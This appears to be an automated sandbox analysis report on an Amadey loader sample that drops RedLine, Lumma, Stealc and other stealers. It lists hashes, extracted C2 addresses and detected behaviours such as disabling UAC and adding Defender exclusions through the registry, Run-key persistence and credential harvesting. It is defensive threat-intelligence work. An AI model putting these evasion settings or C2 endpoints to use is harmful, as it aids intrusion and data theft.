amadey | 65b13c88ba108bc85331d8fd4c92b5f84d48e63f612085a73eaec353f821ccc3

Resubmissions

08-05-2024 17:38

240508-v78vbshh68 10

07-05-2024 20:46

240507-zkn9mafa5t 10

07-05-2024 15:51

240507-tazpqagb25 10

01-05-2024 23:14

240501-28cxlsca92 10

Analysis

max time kernel
238s
max time network
238s
platform
windows10-2004_x64
resource
win10v2004-20240419-en
resource tags

arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
submitted
07-05-2024 15:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

65b13c88ba108bc85331d8fd4c92b5f84d48e63f612085a73eaec353f821ccc3.exe
Size

1.9MB
MD5

cf02058ce59cb0d1f9e9f3146316717f
SHA1

9c276c5d673ad974c0c49e55be5e1952100bbc56
SHA256

65b13c88ba108bc85331d8fd4c92b5f84d48e63f612085a73eaec353f821ccc3
SHA512

5a46d5055bd3e5c94e7214f7600d578cdeadb6de9a4adce17f8d7afb2bc51c35a995fd94d6f16ea7be9b1f5862f6cd7add5d18b7e80b6fc60286041acecdafd7
SSDEEP

49152:V3/bnL0qZ+XLHP19pmfybjyCIaIzRGuyW2/iC2Xxx9lB:VjnLnYXx90abbI3Dy/iC2Xr

Malware Config

Extracted

Family

amadey

Version

4.20

http://193.233.132.139

Attributes

install_dir
5454e6f062
install_file
explorta.exe
strings_key
c7a869c5ba1d72480093ec207994e2bf
url_paths
/sev56rkm/index.php

rc4.plain

Extracted

Family

amadey

Version

4.18

http://193.233.132.56

Attributes

install_dir
09fd851a4f
install_file
explorha.exe
strings_key
443351145ece4966ded809641c77cfa8
url_paths
/Pneh2sXQk0/index.php

rc4.plain

Extracted

Family

risepro

147.45.47.126:58709

Extracted

Family

redline

Botnet

Test1234

185.215.113.67:26260

Extracted

Family

stealc

http://52.143.157.84

Attributes

url_path
/c73eed764cc59dcb.php

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

185.172.128.33:8970

Extracted

Family

lumma

https://affordcharmcropwo.shop/api

https://cleartotalfisherwo.shop/api

https://worryfillvolcawoi.shop/api

https://enthusiasimtitleow.shop/api

https://dismissalcylinderhostw.shop/api

https://diskretainvigorousiw.shop/api

https://communicationgenerwo.shop/api

https://pillowbrocccolipe.shop/api

https://zippyfinickysofwps.shop/api

https://acceptabledcooeprs.shop/api

https://obsceneclassyjuwks.shop/api

https://miniaturefinerninewjs.shop/api

https://plaintediousidowsko.shop/api

https://sweetsquarediaslw.shop/api

https://holicisticscrarws.shop/api

https://boredimperissvieos.shop/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect ZGRat V1 4 IoCs

resource	yara_rule
behavioral2/memory/5996-398-0x0000000000400000-0x0000000000592000-memory.dmp	family_zgrat_v1
behavioral2/files/0x0008000000023bf8-432.dat	family_zgrat_v1
behavioral2/memory/5544-464-0x00000000007F0000-0x00000000008B0000-memory.dmp	family_zgrat_v1
behavioral2/files/0x0007000000023ce5-909.dat	family_zgrat_v1

Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	4iGAcZ9y5M3XYvGSxSeOp8ig.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

resource	yara_rule
behavioral2/files/0x000a000000023ba7-140.dat	family_redline
behavioral2/memory/2084-159-0x0000000000B20000-0x0000000000B72000-memory.dmp	family_redline
behavioral2/files/0x000f000000023bef-427.dat	family_redline
behavioral2/files/0x0008000000023bf8-432.dat	family_redline
behavioral2/memory/5540-436-0x0000000000620000-0x0000000000672000-memory.dmp	family_redline
behavioral2/memory/5544-464-0x00000000007F0000-0x00000000008B0000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Stealc
Stealc is an infostealer written in C++.
stealer stealc

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

Windows security bypass 2 TTPs 3 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe = "0"	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1"	4iGAcZ9y5M3XYvGSxSeOp8ig.exe

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 16 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	amert.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	4iGAcZ9y5M3XYvGSxSeOp8ig.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	65b13c88ba108bc85331d8fd4c92b5f84d48e63f612085a73eaec353f821ccc3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ujCPg5JME4_cYggpTWjO.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	a011c71051.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Sj8zUkhFMmmDjGfb0jdi.exe

Blocklisted process makes network request 5 IoCs

flow	pid	Process
180	6048	rundll32.exe
306	7040	rundll32.exe
306	7040	rundll32.exe
429	9120	rundll32.exe
306	7040	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 17 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
11244	powershell.exe
12080	powershell.exe
12056	powershell.exe
6868	powershell.exe
8092	powershell.exe
5080	powershell.EXE
10488	powershell.exe
9632	powershell.exe
6904	powershell.exe
10172	powershell.exe
2588	powershell.exe
5728	powershell.exe
1624	powershell.exe
8740	powershell.exe
12104	powershell.exe
11000	powershell.exe
8916	powershell.exe

Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 35 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	a011c71051.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Sj8zUkhFMmmDjGfb0jdi.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ujCPg5JME4_cYggpTWjO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ujCPg5JME4_cYggpTWjO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Sj8zUkhFMmmDjGfb0jdi.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	a011c71051.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4iGAcZ9y5M3XYvGSxSeOp8ig.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4iGAcZ9y5M3XYvGSxSeOp8ig.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	65b13c88ba108bc85331d8fd4c92b5f84d48e63f612085a73eaec353f821ccc3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	65b13c88ba108bc85331d8fd4c92b5f84d48e63f612085a73eaec353f821ccc3.exe

Checks computer location settings 2 TTPs 17 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation	NewB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation	a011c71051.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation	ePwBJvh.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation	FeVmxJU.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation	explorta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation	b6ebe28937.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation	4iGAcZ9y5M3XYvGSxSeOp8ig.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation	u2oc.1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation	65b13c88ba108bc85331d8fd4c92b5f84d48e63f612085a73eaec353f821ccc3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation	amert.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation	install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation	explorha.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation	file300un.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation	fKdFV5AmVd326gdNS53V2mA3.exe

Drops startup file 9 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9Mn0q2WimT3doN8Tgvyz76pZ.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5sM0l3NqFUB0wI6evPkOXKnw.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cOnkowmIsNN5ZNQAJHjIyk4r.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ARVfFqC69jHqQ0FHeCDcF9nL.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C829ZwX3Jka0RoH3UOJGOfPH.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\61FxIbRbr1KXy0TFrgLK5SHP.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\47aVRrQQeTXmWRBUlqhKUesm.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QaiW3hrnJm7En4LBcGyTT16I.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tU6vi7eVJbCsXBfYWzLXRHqW.bat	jsc.exe

Executes dropped EXE 64 IoCs

pid	Process
1952	explorta.exe
3044	amert.exe
4852	explorha.exe
2856	a011c71051.exe
2848	b6ebe28937.exe
2600	swiiiii.exe
2084	jok.exe
5236	swiiii.exe
5640	file300un.exe
3468	fKdFV5AmVd326gdNS53V2mA3.exe
5212	gold.exe
5436	yHfUkp6PWcTgkIP6cYyXvQeL.exe
5892	0rfEKA6TP1pzD2uz8e2yYJlL.exe
4440	FTtkwo0yyztEYF10Ymp8Jzza.exe
5924	YZbUxHj1De2oiPxWkxf1KPqO.exe
4524	alexxxxxxxx.exe
5168	4iGAcZ9y5M3XYvGSxSeOp8ig.exe
5544	trf.exe
5540	keks.exe
5040	install.exe
5396	NewB.exe
964	GameService.exe
5720	GameService.exe
5380	GameService.exe
4016	GameService.exe
5328	GameService.exe
5492	GameSyncLink.exe
6028	177790.exe
5708	mLAQ7VMAKuHccMvm4tGFe9CX.exe
1036	Install.exe
6608	GameService.exe
6928	GameService.exe
9796	GameService.exe
8064	GameService.exe
9612	GameService.exe
9788	PiercingNetLink.exe
9864	ujCPg5JME4_cYggpTWjO.exe
10020	ucsXcgnqOZBYk5HGbPuDy3Ac.exe
9888	Install.exe
9560	C8zbImAnLOG7qFppQxLC.exe
7840	Install.exe
9944	Sj8zUkhFMmmDjGfb0jdi.exe
10488	explorha.exe
10496	explorta.exe
10940	GameService.exe
11260	NewB.exe
11984	GameService.exe
4312	Install.exe
6632	GameService.exe
6512	GameService.exe
6756	GameSyncLinks.exe
7104	254411.exe
5084	ZEVaqp48Gz7MK9efLNaIrhhw.exe
11160	ePwBJvh.exe
3592	FeVmxJU.exe
9208	explorta.exe
9236	explorha.exe
3668	NewB.exe
9632	explorha.exe
9764	explorta.exe
1976	NewB.exe
10320	u2oc.0.exe
1064	FTtkwo0yyztEYF10Ymp8Jzza.exe
1648	u2oc.1.exe

Identifies Wine through registry keys 2 TTPs 12 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Wine	explorta.exe
Key opened	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Wine	65b13c88ba108bc85331d8fd4c92b5f84d48e63f612085a73eaec353f821ccc3.exe
Key opened	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Wine	explorta.exe
Key opened	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Wine	explorta.exe
Key opened	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Wine	explorta.exe
Key opened	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Wine	amert.exe
Key opened	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Wine	explorta.exe

Loads dropped DLL 5 IoCs

pid	Process
5988	rundll32.exe
6048	rundll32.exe
6028	177790.exe
7040	rundll32.exe
9120	rundll32.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 40 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x0016000000023a0c-67.dat	themida
behavioral2/memory/2856-81-0x0000000000840000-0x0000000000ECD000-memory.dmp	themida
behavioral2/memory/2856-82-0x0000000000840000-0x0000000000ECD000-memory.dmp	themida
behavioral2/memory/2856-83-0x0000000000840000-0x0000000000ECD000-memory.dmp	themida
behavioral2/memory/2856-85-0x0000000000840000-0x0000000000ECD000-memory.dmp	themida
behavioral2/memory/2856-84-0x0000000000840000-0x0000000000ECD000-memory.dmp	themida
behavioral2/memory/2856-86-0x0000000000840000-0x0000000000ECD000-memory.dmp	themida
behavioral2/memory/2856-88-0x0000000000840000-0x0000000000ECD000-memory.dmp	themida
behavioral2/memory/2856-87-0x0000000000840000-0x0000000000ECD000-memory.dmp	themida
behavioral2/memory/2856-89-0x0000000000840000-0x0000000000ECD000-memory.dmp	themida
behavioral2/files/0x000b000000023be0-392.dat	themida
behavioral2/memory/2856-403-0x0000000000840000-0x0000000000ECD000-memory.dmp	themida
behavioral2/memory/5168-404-0x0000000140000000-0x0000000140917000-memory.dmp	themida
behavioral2/memory/2856-595-0x0000000000840000-0x0000000000ECD000-memory.dmp	themida
behavioral2/memory/5168-596-0x0000000140000000-0x0000000140917000-memory.dmp	themida
behavioral2/files/0x0016000000023ce1-880.dat	themida
behavioral2/files/0x0007000000023cea-944.dat	themida
behavioral2/memory/9864-972-0x0000000000790000-0x0000000000C7C000-memory.dmp	themida
behavioral2/memory/9864-980-0x0000000000790000-0x0000000000C7C000-memory.dmp	themida
behavioral2/memory/9864-981-0x0000000000790000-0x0000000000C7C000-memory.dmp	themida
behavioral2/memory/9864-990-0x0000000000790000-0x0000000000C7C000-memory.dmp	themida
behavioral2/memory/9864-979-0x0000000000790000-0x0000000000C7C000-memory.dmp	themida
behavioral2/memory/5168-978-0x0000000140000000-0x0000000140917000-memory.dmp	themida
behavioral2/memory/2856-970-0x0000000000840000-0x0000000000ECD000-memory.dmp	themida
behavioral2/memory/9864-973-0x0000000000790000-0x0000000000C7C000-memory.dmp	themida
behavioral2/memory/9864-971-0x0000000000790000-0x0000000000C7C000-memory.dmp	themida
behavioral2/memory/9864-1001-0x0000000000790000-0x0000000000C7C000-memory.dmp	themida
behavioral2/memory/9944-1076-0x00000000005B0000-0x0000000000C3D000-memory.dmp	themida
behavioral2/memory/9944-1081-0x00000000005B0000-0x0000000000C3D000-memory.dmp	themida
behavioral2/memory/9944-1087-0x00000000005B0000-0x0000000000C3D000-memory.dmp	themida
behavioral2/memory/9944-1091-0x00000000005B0000-0x0000000000C3D000-memory.dmp	themida
behavioral2/memory/9944-1093-0x00000000005B0000-0x0000000000C3D000-memory.dmp	themida
behavioral2/memory/2856-1144-0x0000000000840000-0x0000000000ECD000-memory.dmp	themida
behavioral2/memory/9944-1092-0x00000000005B0000-0x0000000000C3D000-memory.dmp	themida
behavioral2/memory/9944-1090-0x00000000005B0000-0x0000000000C3D000-memory.dmp	themida
behavioral2/memory/9944-1089-0x00000000005B0000-0x0000000000C3D000-memory.dmp	themida
behavioral2/memory/9944-1088-0x00000000005B0000-0x0000000000C3D000-memory.dmp	themida
behavioral2/memory/5168-1276-0x0000000140000000-0x0000000140917000-memory.dmp	themida
behavioral2/memory/5168-1414-0x0000000140000000-0x0000000140917000-memory.dmp	themida
behavioral2/memory/9944-1446-0x00000000005B0000-0x0000000000C3D000-memory.dmp	themida

Windows security modification 2 TTPs 4 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe = "0"	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1"	4iGAcZ9y5M3XYvGSxSeOp8ig.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	file300un.exe

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a011c71051.exe
Key opened	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a011c71051.exe
Key opened	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a011c71051.exe
Key opened	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	ZEVaqp48Gz7MK9efLNaIrhhw.exe
Key opened	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	ZEVaqp48Gz7MK9efLNaIrhhw.exe
Key opened	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	ZEVaqp48Gz7MK9efLNaIrhhw.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe"	a011c71051.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV131_ab414e7959b5772c8d538ffeee266027 = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV131_ab414e7959b5772c8d538ffeee266027\\AdobeUpdaterV131.exe"	a011c71051.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV131_38df83dfe9ed9bb5b7c2e2e32d8073da = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV131_38df83dfe9ed9bb5b7c2e2e32d8073da\\AdobeUpdaterV131.exe"	a011c71051.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV131_90631568f4eda919856d13dba2bc5770 = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV131_90631568f4eda919856d13dba2bc5770\\AdobeUpdaterV131.exe"	a011c71051.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a011c71051.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020001\\a011c71051.exe"	explorta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b6ebe28937.exe = "C:\\Users\\Admin\\1000021002\\b6ebe28937.exe"	explorta.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 6 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Sj8zUkhFMmmDjGfb0jdi.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	a011c71051.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	4iGAcZ9y5M3XYvGSxSeOp8ig.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ujCPg5JME4_cYggpTWjO.exe

Drops Chrome extension 3 IoCs

description	ioc	Process
